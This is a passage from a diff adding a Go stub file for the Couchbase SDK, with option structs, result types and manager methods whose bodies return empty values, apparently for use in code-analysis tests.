ParentSpan RequestSpan + Context context.Context +} + +type DropCollectionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropDesignDocumentOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropEventingFunctionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropGroupOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropPrimaryQueryIndexOptions struct { + IgnoreIfNotExists bool + CustomName string + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ScopeName string + CollectionName string + Context context.Context +} + +type DropQueryIndexOptions struct { + IgnoreIfNotExists bool + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ScopeName string + CollectionName string + Context context.Context +} + +type DropScopeOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type DropUserOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + DomainName string + ParentSpan RequestSpan + Context context.Context +} + +type DurabilityLevel uint8 + +type EndPointDiagnostics struct { + Type ServiceType + ID string + Local string + Remote string + LastActivity time.Time + State EndpointState + Namespace string +} + +type EndpointPingReport struct { + ID string + Local string + Remote string + State PingState + Error string + Namespace string + Latency time.Duration +} + +type EndpointState uint + +type EventingFunction struct { + Name string + Code string + Version string + EnforceSchema bool + HandlerUUID int + FunctionInstanceID string + MetadataKeyspace EventingFunctionKeyspace + SourceKeyspace EventingFunctionKeyspace + BucketBindings []EventingFunctionBucketBinding + UrlBindings []EventingFunctionUrlBinding + ConstantBindings []EventingFunctionConstantBinding + Settings EventingFunctionSettings +} + +func (_ *EventingFunction) MarshalJSON() ([]byte, error) { + return nil, nil +} + +func (_ *EventingFunction) UnmarshalJSON(_ []byte) error { + return nil +} + +type EventingFunctionBucketAccess string + +type EventingFunctionBucketBinding struct { + Alias string + Name EventingFunctionKeyspace + Access EventingFunctionBucketAccess +} + +type EventingFunctionConstantBinding struct { + Alias string + Literal string +} + +type EventingFunctionDCPBoundary string + +type EventingFunctionDeploymentStatus bool + +type EventingFunctionKeyspace struct { + Bucket string + Scope string + Collection string +} + +type EventingFunctionLanguageCompatibility string + +type EventingFunctionLogLevel string + +type EventingFunctionManager struct{} + +func (_ *EventingFunctionManager) DeployFunction(_ string, _ *DeployEventingFunctionOptions) error { + return nil +} + +func (_ *EventingFunctionManager) DropFunction(_ string, _ *DropEventingFunctionOptions) error { + return nil +} + +func (_ *EventingFunctionManager) FunctionsStatus(_ *EventingFunctionsStatusOptions) (*EventingStatus, error) { + return nil, nil +} + +func (_ *EventingFunctionManager) GetAllFunctions(_ *GetAllEventingFunctionsOptions) ([]EventingFunction, error) { + return nil, nil +} + +func (_ *EventingFunctionManager) GetFunction(_ string, _ *GetEventingFunctionOptions) (*EventingFunction, error) { + return nil, nil +} + +func (_ *EventingFunctionManager) PauseFunction(_ string, _ *PauseEventingFunctionOptions) error { + return nil +} + +func (_ *EventingFunctionManager) ResumeFunction(_ string, _ *ResumeEventingFunctionOptions) error { + return nil +} + +func (_ *EventingFunctionManager) UndeployFunction(_ string, _ *UndeployEventingFunctionOptions) error { + return nil +} + +func (_ *EventingFunctionManager) UpsertFunction(_ EventingFunction, _ *UpsertEventingFunctionOptions) error { + return nil +} + +type EventingFunctionProcessingStatus bool + +type EventingFunctionSettings struct { + CPPWorkerThreadCount int + DCPStreamBoundary EventingFunctionDCPBoundary + Description string + DeploymentStatus EventingFunctionDeploymentStatus + ProcessingStatus EventingFunctionProcessingStatus + LanguageCompatibility EventingFunctionLanguageCompatibility + LogLevel EventingFunctionLogLevel + ExecutionTimeout time.Duration + LCBInstCapacity int + LCBRetryCount int + LCBTimeout time.Duration + QueryConsistency QueryScanConsistency + NumTimerPartitions int + SockBatchSize int + TickDuration time.Duration + TimerContextSize int + UserPrefix string + BucketCacheSize int + BucketCacheAge int + CurlMaxAllowedRespSize int + QueryPrepareAll bool + WorkerCount int + HandlerHeaders []string + HandlerFooters []string + EnableAppLogRotation bool + AppLogDir string + AppLogMaxSize int + AppLogMaxFiles int + CheckpointInterval time.Duration +} + +type EventingFunctionState struct { + Name string + Status EventingFunctionStatus + NumBootstrappingNodes int + NumDeployedNodes int + DeploymentStatus EventingFunctionDeploymentStatus + ProcessingStatus EventingFunctionProcessingStatus +} + +type EventingFunctionStatus string + +type EventingFunctionUrlAuth interface { + Key() string + Method() string + Password() string + Username() string +} + +type EventingFunctionUrlBinding struct { + Hostname string + Alias string + Auth EventingFunctionUrlAuth + AllowCookies bool + ValidateSSLCertificate bool +} + +type EventingFunctionsStatusOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type EventingStatus struct { + NumEventingNodes int + Functions []EventingFunctionState +} + +func (_ *EventingStatus) UnmarshalJSON(_ []byte) error { + return nil +} + +type EvictionPolicyType string + +type ExistsOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type ExistsResult struct { + Result +} + +func (_ *ExistsResult) Cas() Cas { + return 0 +} + +func (_ *ExistsResult) Exists() bool { + return false +} + +type FlushBucketOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type FreezePlanSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetAllAnalyticsDatasetsOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetAllAnalyticsIndexesOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetAllBucketsOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetAllDesignDocumentsOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetAllEventingFunctionsOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetAllGroupsOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetAllQueryIndexesOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ScopeName string + CollectionName string + Context context.Context +} + +type GetAllReplicaOptions struct { + Transcoder Transcoder + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ReadPreference ReadPreference + Context context.Context + Internal struct { + User string + } +} + +type GetAllReplicasResult struct{} + +func (_ *GetAllReplicasResult) Close() error { + return nil +} + +func (_ *GetAllReplicasResult) Next() *GetReplicaResult { + return nil +} + +type GetAllScopesOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetAllSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetAllUsersOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + DomainName string + ParentSpan RequestSpan + Context context.Context +} + +type GetAnalyticsLinksOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Dataverse string + LinkType AnalyticsLinkType + Name string + Context context.Context +} + +type GetAndLockOptions struct { + Transcoder Transcoder + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type GetAndTouchOptions struct { + Transcoder Transcoder + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type GetAnyReplicaOptions struct { + Transcoder Transcoder + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ReadPreference ReadPreference + Context context.Context + Internal struct { + User string + } +} + +type GetBucketOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetDesignDocumentOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetEventingFunctionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetGroupOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetIndexedDocumentsCountOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetNodesMetadataOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetOptions struct { + WithExpiry bool + Project []string + Transcoder Transcoder + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type GetPendingMutationsAnalyticsOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetReplicaResult struct { + GetResult +} + +func (_ *GetReplicaResult) Cas() Cas { + return 0 +} + +func (_ *GetReplicaResult) Content(_ interface{}) error { + return nil +} + +func (_ *GetReplicaResult) Expiry() *time.Duration { + return nil +} + +func (_ *GetReplicaResult) ExpiryTime() time.Time { + return time.Time{} +} + +func (_ *GetReplicaResult) IsReplica() bool { + return false +} + +type GetResult struct { + Result +} + +func (_ *GetResult) Cas() Cas { + return 0 +} + +func (_ *GetResult) Content(_ interface{}) error { + return nil +} + +func (_ *GetResult) Expiry() *time.Duration { + return nil +} + +func (_ *GetResult) ExpiryTime() time.Time { + return time.Time{} +} + +type GetRolesOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type GetUserOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + DomainName string + ParentSpan RequestSpan + Context context.Context +} + +type Group struct { + Name string + Description string + Roles []Role + LDAPGroupReference string +} + +type HistoryRetentionCollectionDefault uint8 + +type IncrementOptions struct { + Timeout time.Duration + Expiry time.Duration + Initial int64 + Delta uint64 + DurabilityLevel DurabilityLevel + PersistTo uint + ReplicateTo uint + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Cas Cas + Context context.Context + Internal struct { + User string + } +} + +type InsertOptions struct { + Expiry time.Duration + PersistTo uint + ReplicateTo uint + DurabilityLevel DurabilityLevel + Transcoder Transcoder + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type InternalBucket struct{} + +func (_ *InternalBucket) CapabilityStatus(_ Capability) (CapabilityStatus, error) { + return 0, nil +} + +func (_ *InternalBucket) IORouter() (interface{}, error) { + return nil, nil +} + +type InternalCluster struct{} + +func (_ *InternalCluster) GetNodesMetadata(_ *GetNodesMetadataOptions) ([]NodeMetadata, error) { + return nil, nil +} + +type InternalTransactionAttemptContext struct{} + +func (_ *InternalTransactionAttemptContext) IsExpired() bool { + return false +} + +type LogLevel int + +type LookupInAllReplicaOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ReadPreference ReadPreference + Context context.Context + Internal struct { + DocFlags SubdocDocFlag + User string + } +} + +type LookupInAllReplicasResult struct{} + +func (_ *LookupInAllReplicasResult) Close() error { + return nil +} + +func (_ *LookupInAllReplicasResult) Next() *LookupInReplicaResult { + return nil +} + +type LookupInAnyReplicaOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + ReadPreference ReadPreference + Context context.Context + Internal struct { + DocFlags SubdocDocFlag + User string + } +} + +type LookupInOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + DocFlags SubdocDocFlag + User string + } +} + +type LookupInReplicaResult struct { + *LookupInResult +} + +func (_ *LookupInReplicaResult) IsReplica() bool { + return false +} + +type LookupInResult struct { + Result +} + +func (_ *LookupInResult) Cas() Cas { + return 0 +} + +func (_ *LookupInResult) ContentAt(_ uint, _ interface{}) error { + return nil +} + +func (_ *LookupInResult) Exists(_ uint) bool { + return false +} + +type LookupInSpec struct{} + +type MutateInOptions struct { + Expiry time.Duration + Cas Cas + PersistTo uint + ReplicateTo uint + DurabilityLevel DurabilityLevel + StoreSemantic StoreSemantics + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + PreserveExpiry bool + Context context.Context + Internal struct { + DocFlags SubdocDocFlag + User string + } +} + +type MutateInResult struct { + MutationResult +} + +func (_ MutateInResult) ContentAt(_ uint, _ interface{}) error { + return nil +} + +type MutateInSpec struct{} + +type MutationResult struct { + Result +} + +func (_ MutationResult) MutationToken() *MutationToken { + return nil +} + +func (_ *MutationResult) Cas() Cas { + return 0 +} + +type MutationState struct{} + +func (_ *MutationState) Add(_ ...MutationToken) {} + +func (_ *MutationState) Internal() *MutationStateInternal { + return nil +} + +func (_ *MutationState) MarshalJSON() ([]byte, error) { + return nil, nil +} + +func (_ *MutationState) UnmarshalJSON(_ []byte) error { + return nil +} + +type MutationStateInternal struct{} + +func (_ *MutationStateInternal) Add(_ string, _ ...interface{}) {} + +func (_ *MutationStateInternal) Tokens() []MutationToken { + return nil +} + +type MutationToken struct{} + +func (_ MutationToken) BucketName() string { + return "" +} + +func (_ MutationToken) PartitionID() uint64 { + return 0 +} + +func (_ MutationToken) PartitionUUID() uint64 { + return 0 +} + +func (_ MutationToken) SequenceNumber() uint64 { + return 0 +} + +type NodeMetadata struct { + ClusterCompatibility int + ClusterMembership string + CouchAPIBase string + Hostname string + InterestingStats map[string]float64 + MCDMemoryAllocated float64 + MCDMemoryReserved float64 + MemoryFree float64 + MemoryTotal float64 + OS string + Ports map[string]int + Status string + Uptime int + Version string + ThisNode bool +} + +type Origin struct { + Type string + Name string +} + +type PauseEventingFunctionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type PauseIngestSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type PingOptions struct { + ServiceTypes []ServiceType + ReportID string + Timeout time.Duration + ParentSpan RequestSpan + Context context.Context +} + +type PingResult struct { + ID string + Services map[ServiceType][]EndpointPingReport +} + +func (_ *PingResult) MarshalJSON() ([]byte, error) { + return nil, nil +} + +type PingState uint + +type PrependOptions struct { + Timeout time.Duration + DurabilityLevel DurabilityLevel + PersistTo uint + ReplicateTo uint + Cas Cas + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type PublishDesignDocumentOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type QueryIndex struct { + Name string + IsPrimary bool + Type QueryIndexType + State string + Keyspace string + Namespace string + IndexKey []string + Condition string + Partition string + CollectionName string + ScopeName string + BucketName string +} + +type QueryIndexManager struct{} + +func (_ *QueryIndexManager) BuildDeferredIndexes(_ string, _ *BuildDeferredQueryIndexOptions) ([]string, error) { + return nil, nil +} + +func (_ *QueryIndexManager) CreateIndex(_ string, _ string, _ []string, _ *CreateQueryIndexOptions) error { + return nil +} + +func (_ *QueryIndexManager) CreatePrimaryIndex(_ string, _ *CreatePrimaryQueryIndexOptions) error { + return nil +} + +func (_ *QueryIndexManager) DropIndex(_ string, _ string, _ *DropQueryIndexOptions) error { + return nil +} + +func (_ *QueryIndexManager) DropPrimaryIndex(_ string, _ *DropPrimaryQueryIndexOptions) error { + return nil +} + +func (_ *QueryIndexManager) GetAllIndexes(_ string, _ *GetAllQueryIndexesOptions) ([]QueryIndex, error) { + return nil, nil +} + +func (_ *QueryIndexManager) WatchIndexes(_ string, _ []string, _ time.Duration, _ *WatchQueryIndexOptions) error { + return nil +} + +type QueryIndexType string + +type QueryMetaData struct { + RequestID string + ClientContextID string + Status QueryStatus + Metrics QueryMetrics + Signature interface{} + Warnings []QueryWarning + Profile interface{} +} + +type QueryMetrics struct { + ElapsedTime time.Duration + ExecutionTime time.Duration + ResultCount uint64 + ResultSize uint64 + MutationCount uint64 + SortCount uint64 + ErrorCount uint64 + WarningCount uint64 +} + +type QueryOptions struct { + ScanConsistency QueryScanConsistency + ConsistentWith *MutationState + Profile QueryProfileMode + ScanCap uint32 + PipelineBatch uint32 + PipelineCap uint32 + ScanWait time.Duration + Readonly bool + MaxParallelism uint32 + ClientContextID string + PositionalParameters []interface{} + NamedParameters map[string]interface{} + Metrics bool + Raw map[string]interface{} + Adhoc bool + Timeout time.Duration + RetryStrategy RetryStrategy + FlexIndex bool + PreserveExpiry bool + ParentSpan RequestSpan + Context context.Context + AsTransaction *SingleQueryTransactionOptions + UseReplica QueryUseReplicaLevel + Internal struct { + User string + Endpoint string + } +} + +type QueryProfileMode string + +type QueryResult struct{} + +func (_ *QueryResult) Close() error { + return nil +} + +func (_ *QueryResult) Err() error { + return nil +} + +func (_ *QueryResult) Internal() *QueryResultInternal { + return nil +} + +func (_ *QueryResult) MetaData() (*QueryMetaData, error) { + return nil, nil +} + +func (_ *QueryResult) Next() bool { + return false +} + +func (_ *QueryResult) One(_ interface{}) error { + return nil +} + +func (_ *QueryResult) Raw() *QueryResultRaw { + return nil +} + +func (_ *QueryResult) Row(_ interface{}) error { + return nil +} + +type QueryResultInternal struct{} + +func (_ *QueryResultInternal) Endpoint() string { + return "" +} + +type QueryResultRaw struct{} + +func (_ *QueryResultRaw) Close() error { + return nil +} + +func (_ *QueryResultRaw) Err() error { + return nil +} + +func (_ *QueryResultRaw) MetaData() ([]byte, error) { + return nil, nil +} + +func (_ *QueryResultRaw) NextBytes() []byte { + return nil +} + +type QueryScanConsistency uint + +type QueryStatus string + +type QueryUseReplicaLevel uint + +type QueryWarning struct { + Code uint32 + Message string +} + +type ReadPreference uint8 + +type RemoveOptions struct { + Cas Cas + PersistTo uint + ReplicateTo uint + DurabilityLevel DurabilityLevel + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type ReplaceAnalyticsLinkOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type ReplaceOptions struct { + Expiry time.Duration + Cas Cas + PersistTo uint + ReplicateTo uint + DurabilityLevel DurabilityLevel + Transcoder Transcoder + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + PreserveExpiry bool + Context context.Context + Internal struct { + User string + } +} + +type RequestSpan interface { + AddEvent(_ string, _ time.Time) + Context() RequestSpanContext + End() + SetAttribute(_ string, _ interface{}) +} + +type RequestSpanContext interface{} + +type Result struct{} + +func (_ *Result) Cas() Cas { + return 0 +} + +type ResumeEventingFunctionOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type ResumeIngestSearchIndexOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context +} + +type RetryAction interface { + Duration() time.Duration +} + +type RetryReason interface { + AllowsNonIdempotentRetry() bool + AlwaysRetry() bool + Description() string +} + +type RetryRequest interface { + Idempotent() bool + Identifier() string + RetryAttempts() uint32 + RetryReasons() []RetryReason +} + +type RetryStrategy interface { + RetryAfter(_ RetryRequest, _ RetryReason) RetryAction +} + +type Role struct { + Name string + Bucket string + Scope string + Collection string +} + +type RoleAndDescription struct { + Role + DisplayName string + Description string +} + +type RoleAndOrigins struct { + Role + Origins []Origin +} + +type ScanOptions struct { + Transcoder Transcoder + Timeout time.Duration + ParentSpan RequestSpan + Context context.Context + IDsOnly bool + ConsistentWith *MutationState + BatchByteLimit *uint32 + BatchItemLimit *uint32 + Concurrency uint16 + Internal struct { + User string + } +} + +type ScanResult struct{} + +func (_ *ScanResult) Close() error { + return nil +} + +func (_ *ScanResult) Err() error { + return nil +} + +func (_ *ScanResult) Next() *ScanResultItem { + return nil +} + +type ScanResultItem struct { + Result +} + +func (_ *ScanResultItem) Cas() Cas { + return 0 +} + +func (_ *ScanResultItem) Content(_ interface{}) error { + return nil +} + +func (_ *ScanResultItem) ExpiryTime() time.Time { + return time.Time{} +} + +func (_ *ScanResultItem) ID() string { + return "" +} + +func (_ *ScanResultItem) IDOnly() bool { + return false +} + +type ScanType interface{} + +type Scope struct{} + +func (_ *Scope) AnalyticsQuery(_ string, _ *AnalyticsOptions) (*AnalyticsResult, error) { + return nil, nil +} + +func (_ *Scope) BucketName() string { + return "" +} + +func (_ *Scope) Collection(_ string) *Collection { + return nil +} + +func (_ *Scope) EventingFunctions() *ScopeEventingFunctionManager { + return nil +} + +func (_ *Scope) Name() string { + return "" +} + +func (_ *Scope) Query(_ string, _ *QueryOptions) (*QueryResult, error) { + return nil, nil +} + +func (_ *Scope) Search(_ string, _ SearchRequest, _ *SearchOptions) (*SearchResult, error) { + return nil, nil +} + +func (_ *Scope) SearchIndexes() *ScopeSearchIndexManager { + return nil +} + +type ScopeEventingFunctionManager struct{} + +func (_ *ScopeEventingFunctionManager) DeployFunction(_ string, _ *DeployEventingFunctionOptions) error { + return nil +} + +func (_ *ScopeEventingFunctionManager) DropFunction(_ string, _ *DropEventingFunctionOptions) error { + return nil +} + +func (_ *ScopeEventingFunctionManager) FunctionsStatus(_ *EventingFunctionsStatusOptions) (*EventingStatus, error) { + return nil, nil +} + +func (_ *ScopeEventingFunctionManager) GetAllFunctions(_ *GetAllEventingFunctionsOptions) ([]EventingFunction, error) { + return nil, nil +} + +func (_ *ScopeEventingFunctionManager) GetFunction(_ string, _ *GetEventingFunctionOptions) (*EventingFunction, error) { + return nil, nil +} + +func (_ *ScopeEventingFunctionManager) PauseFunction(_ string, _ *PauseEventingFunctionOptions) error { + return nil +} + +func (_ *ScopeEventingFunctionManager) ResumeFunction(_ string, _ *ResumeEventingFunctionOptions) error { + return nil +} + +func (_ *ScopeEventingFunctionManager) UndeployFunction(_ string, _ *UndeployEventingFunctionOptions) error { + return nil +} + +func (_ *ScopeEventingFunctionManager) UpsertFunction(_ EventingFunction, _ *UpsertEventingFunctionOptions) error { + return nil +} + +type ScopeSearchIndexManager struct{} + +func (_ *ScopeSearchIndexManager) AllowQuerying(_ string, _ *AllowQueryingSearchIndexOptions) error { + return nil +} + +func (_ *ScopeSearchIndexManager) AnalyzeDocument(_ string, _ interface{}, _ *AnalyzeDocumentOptions) ([]interface{}, error) { + return nil, nil +} + +func (_ *ScopeSearchIndexManager) DisallowQuerying(_ string, _ *DisallowQueryingSearchIndexOptions) error { + return nil +} + +func (_ *ScopeSearchIndexManager) DropIndex(_ string, _ *DropSearchIndexOptions) error { + return nil +} + +func (_ *ScopeSearchIndexManager) FreezePlan(_ string, _ *FreezePlanSearchIndexOptions) error { + return nil +} + +func (_ *ScopeSearchIndexManager) GetAllIndexes(_ *GetAllSearchIndexOptions) ([]SearchIndex, error) { + return nil, nil +} + +func (_ *ScopeSearchIndexManager) GetIndex(_ string, _ *GetSearchIndexOptions) (*SearchIndex, error) { + return nil, nil +} + +func (_ *ScopeSearchIndexManager) GetIndexedDocumentsCount(_ string, _ *GetIndexedDocumentsCountOptions) (uint64, error) { + return 0, nil +} + +func (_ *ScopeSearchIndexManager) PauseIngest(_ string, _ *PauseIngestSearchIndexOptions) error { + return nil +} + +func (_ *ScopeSearchIndexManager) ResumeIngest(_ string, _ *ResumeIngestSearchIndexOptions) error { + return nil +} + +func (_ *ScopeSearchIndexManager) UnfreezePlan(_ string, _ *UnfreezePlanSearchIndexOptions) error { + return nil +} + +func (_ *ScopeSearchIndexManager) UpsertIndex(_ SearchIndex, _ *UpsertSearchIndexOptions) error { + return nil +} + +type ScopeSpec struct { + Name string + Collections []CollectionSpec +} + +type SearchDateRangeFacetResult struct { + Name string + Start string + End string + Count int +} + +type SearchFacetResult struct { + Name string + Field string + Total uint64 + Missing uint64 + Other uint64 + Terms []SearchTermFacetResult + NumericRanges []SearchNumericRangeFacetResult + DateRanges []SearchDateRangeFacetResult +} + +type SearchHighlightOptions struct { + Style SearchHighlightStyle + Fields []string +} + +type SearchHighlightStyle string + +type SearchIndex struct { + UUID string + Name string + SourceName string + Type string + Params map[string]interface{} + SourceUUID string + SourceParams map[string]interface{} + SourceType string + PlanParams map[string]interface{} +} + +func (_ *SearchIndex) MarshalJSON() ([]byte, error) { + return nil, nil +} + +func (_ *SearchIndex) UnmarshalJSON(_ []byte) error { + return nil +} + +type SearchIndexManager struct{} + +func (_ *SearchIndexManager) AllowQuerying(_ string, _ *AllowQueryingSearchIndexOptions) error { + return nil +} + +func (_ *SearchIndexManager) AnalyzeDocument(_ string, _ interface{}, _ *AnalyzeDocumentOptions) ([]interface{}, error) { + return nil, nil +} + +func (_ *SearchIndexManager) DisallowQuerying(_ string, _ *AllowQueryingSearchIndexOptions) error { + return nil +} + +func (_ *SearchIndexManager) DropIndex(_ string, _ *DropSearchIndexOptions) error { + return nil +} + +func (_ *SearchIndexManager) FreezePlan(_ string, _ *AllowQueryingSearchIndexOptions) error { + return nil +} + +func (_ *SearchIndexManager) GetAllIndexes(_ *GetAllSearchIndexOptions) ([]SearchIndex, error) { + return nil, nil +} + +func (_ *SearchIndexManager) GetIndex(_ string, _ *GetSearchIndexOptions) (*SearchIndex, error) { + return nil, nil +} + +func (_ *SearchIndexManager) GetIndexedDocumentsCount(_ string, _ *GetIndexedDocumentsCountOptions) (uint64, error) { + return 0, nil +} + +func (_ *SearchIndexManager) PauseIngest(_ string, _ *PauseIngestSearchIndexOptions) error { + return nil +} + +func (_ *SearchIndexManager) ResumeIngest(_ string, _ *ResumeIngestSearchIndexOptions) error { + return nil +} + +func (_ *SearchIndexManager) UnfreezePlan(_ string, _ *AllowQueryingSearchIndexOptions) error { + return nil +} + +func (_ *SearchIndexManager) UpsertIndex(_ SearchIndex, _ *UpsertSearchIndexOptions) error { + return nil +} + +type SearchMetaData struct { + Metrics SearchMetrics + Errors map[string]string +} + +type SearchMetrics struct { + Took time.Duration + TotalRows uint64 + MaxScore float64 + TotalPartitionCount uint64 + SuccessPartitionCount uint64 + ErrorPartitionCount uint64 +} + +type SearchNumericRangeFacetResult struct { + Name string + Min float64 + Max float64 + Count int +} + +type SearchOptions struct { + ScanConsistency SearchScanConsistency + Limit uint32 + Skip uint32 + Explain bool + Highlight *SearchHighlightOptions + Fields []string + Sort []interface{} + Facets map[string]interface{} + ConsistentWith *MutationState + Raw map[string]interface{} + Timeout time.Duration + RetryStrategy RetryStrategy + DisableScoring bool + Collections []string + ParentSpan RequestSpan + Context context.Context + IncludeLocations bool + Internal struct { + User string + } +} + +type SearchRequest struct { + SearchQuery interface{} + VectorSearch interface{} +} + +type SearchResult struct{} + +func (_ *SearchResult) Close() error { + return nil +} + +func (_ *SearchResult) Err() error { + return nil +} + +func (_ *SearchResult) Facets() (map[string]SearchFacetResult, error) { + return nil, nil +} + +func (_ *SearchResult) MetaData() (*SearchMetaData, error) { + return nil, nil +} + +func (_ *SearchResult) Next() bool { + return false +} + +func (_ *SearchResult) Raw() *SearchResultRaw { + return nil +} + +func (_ *SearchResult) Row() SearchRow { + return SearchRow{} +} + +type SearchResultRaw struct{} + +func (_ *SearchResultRaw) Close() error { + return nil +} + +func (_ *SearchResultRaw) Err() error { + return nil +} + +func (_ *SearchResultRaw) MetaData() ([]byte, error) { + return nil, nil +} + +func (_ *SearchResultRaw) NextBytes() []byte { + return nil +} + +type SearchRow struct { + Index string + ID string + Score float64 + Explanation interface{} + Locations map[string]map[string][]SearchRowLocation + Fragments map[string][]string +} + +func (_ *SearchRow) Fields(_ interface{}) error { + return nil +} + +type SearchRowLocation struct { + Position uint32 + Start uint32 + End uint32 + ArrayPositions []uint32 +} + +type SearchScanConsistency uint + +type SearchTermFacetResult struct { + Term string + Count int +} + +type ServiceType int + +type SingleQueryTransactionOptions struct { + DurabilityLevel DurabilityLevel + Internal struct { + Hooks TransactionHooks + } +} + +type StorageBackend string + +type StoreSemantics uint8 + +type SubdocDocFlag uint8 + +type TouchOptions struct { + Timeout time.Duration + RetryStrategy RetryStrategy + ParentSpan RequestSpan + Context context.Context + Internal struct { + User string + } +} + +type TransactionAttemptContext struct{} + +func (_ *TransactionAttemptContext) Get(_ *Collection, _ string) (*TransactionGetResult, error) { + return nil, nil +} + +func (_ *TransactionAttemptContext) GetReplicaFromPreferredServerGroup(_ *Collection, _ string) (*TransactionGetResult, error) { + return nil, nil +} + +func (_ *TransactionAttemptContext) Insert(_ *Collection, _ string, _ interface{}) (*TransactionGetResult, error) { + return nil, nil +} + +func (_ *TransactionAttemptContext) Internal() *InternalTransactionAttemptContext { + return nil +} + +func (_ *TransactionAttemptContext) Query(_ string, _ *TransactionQueryOptions) (*TransactionQueryResult, error) { + return nil, nil +} + +func (_ *TransactionAttemptContext) Remove(_ *TransactionGetResult) error { + return nil +} + +func (_ *TransactionAttemptContext) Replace(_ *TransactionGetResult, _ interface{}) (*TransactionGetResult, error) { + return nil, nil +} + +type TransactionAttemptState int + +type TransactionCleanupAttempt struct { + Success bool + IsReqular bool + AttemptID string + AtrID string + AtrCollectionName string + AtrScopeName string + AtrBucketName string + Request *TransactionCleanupRequest +} + +type TransactionCleanupRequest struct { + AttemptID string + AtrID string + AtrCollectionName string + AtrScopeName string + AtrBucketName string + Inserts []TransactionDocRecord + Replaces []TransactionDocRecord + 